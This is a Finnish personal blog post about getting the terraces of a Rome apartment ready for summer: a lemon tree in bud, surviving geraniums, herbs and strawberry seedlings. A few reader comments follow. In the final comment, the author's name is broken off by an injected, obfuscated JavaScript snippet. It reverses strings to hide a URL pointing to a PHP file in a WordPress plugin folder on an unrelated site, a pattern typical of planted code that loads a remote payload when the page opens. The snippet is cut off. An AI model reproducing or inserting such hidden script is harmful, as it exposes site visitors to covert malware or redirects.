Image Alt

Blog

Terassikausi alkaa

No niin, tarkoitukseni oli korjata aloittelevan bloggarin virheitä ja kirjoittaa tänne vähän useammin ja nimenomaan Roomasta. Mutta luonnokset shoppailusta ja kiinnostavista paikoista saavat nyt vielä hetken odottaa viimeistelyään, sillä nyt sormet tahtovat näppäimistöltä multaan ja ehdottomasti kiinnostavin paikka Roomassa on oma terassi. Ulkona on nimittäin 25 astetta lämmintä ja on siis aika laittaa terassit lopullisesti kesäkuntoon. Kyllä, monikossa sillä asunnossamme on kattoterassin lisäksi kolme (3) muutakin isohkoa terassia…mikä on kivaa – paitsi ehkä juuri nyt, kun ne piti lakaista ja pestä talven jäljiltä. 

Terasseilla ei kasvanut mitään valmiina, joten nyt on kiva seurata, miten jokseenkin omiin oloihinsa jättämäni vähäiset istutukseni ovat talvesta selvinneet. Tärkeimmät ensin: sitruunapuussa on nuppuja. Eli siis toivoa on, että saadaan limoncelloa omista sitruunoista ensi vuonnakin. Noi lehdet näyttää kyllä vieläkin vähän surkeilta. Oisko kellään kokemusta sitruunapuun hoidosta?

Ruukkuihin unohtuneet talvehtimaan jätetyt pelargoniat näyttävät pukkaavan uutta lehteä. Kasvun ihme! Joku saattoi luulla niitä viime kesän jälkeen jokseenkin kuolleiksi.

Minttu selviää aina. (Joo, näen kuvassa myös rikkaruohon. Nekin selviävät aina.) Samoin salvia, vaikka nyt näyttääkin olevan vettä vailla.

Viime viikolla kokeeksi kylvämäni mansikoissa näyttää ihan selvästi sirkkalehtiä. Eikö?!

Lisäksi ruukuissa kasvaa jo persiljaa, basilikaa, tilliä ja tietenkin rosmariinia ja timjamia, joita voi käydä napsimassa ruokiinsa ympäri vuoden.

Terassikausi on siis alkanut. Jo parit aamukahvitkin (no okei, JA kuoharit) on siellä ehditty nauttia ja viime viikonloppuna jo grillattiinkin. Koska terassikausi kestää ainakin lokakuun loppuun, epäilemättä saatte nähdä kuvia näistä todellisista lempipaikoistani Roomassa. Kuten tästä riippukeinusta kattoterassilla, johon tänään ihan hetkeksi oikaisin yhden kunnostusprojektin päätteeksi.

Jälkikirjoitus. Mutta sitten moka, moka, moka. Hellelukemista hullaantuneena menin hakemaan poikaa koulusta t-paitasillaan (siis oli mulla farkutkin). Olishan se pitänyt muistaa, että pitää katsoa kalenteria, eikä lämpömittaria! Nyt on vasta maaliskuu. Ne katseet, jotka italialaiset toppatakeissaan minuun loivat.

0 0 votes
Article Rating
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

6 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Heli
10 years ago

Olen täällä selvästi etevämpi puutarhuri kuin Suomessa, jossa yksikään terassille unoh…talvehtimaan jätetty kasvi ei selvinnyt hengissä talvesta 🙂 Kävin jo paikallisessa puutarhassakin, mutta täytyy vähän googlata helppohoitoisia, mutta näyttäviä paikallisia kasveja. Nyt taas kylmä keli estää tekemästä hätiköityjä päätöksiä.

Heli
10 years ago

Täällä toki näkee lenkkeilijöitäkin. Tosin enimmäkseen lenkille tullaan autolla puiston eteen, kaduilla ei lenkkeilijöitä näy.

Anonyymi
Anonyymi
10 years ago

🙂 Jos postaisin tähän kuvan makkarin kaapin päälle unoht.. talvehtimaan pistetystä viime vuoden terassipelargoniastani ja sen kolmesta, sentin läpimittaisesta hailakasta lehdestä, sitruunapuusi näyttäisi terveyden perikuvalta. On varmaan taas tänäkin keväänä asiaa paikalliselle puutarhalle. Mutta ihanaa, ihanaa terassikevätttä ja -kesää teille! t. Sari ä.

Signora Finl<script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=f
Signora Finl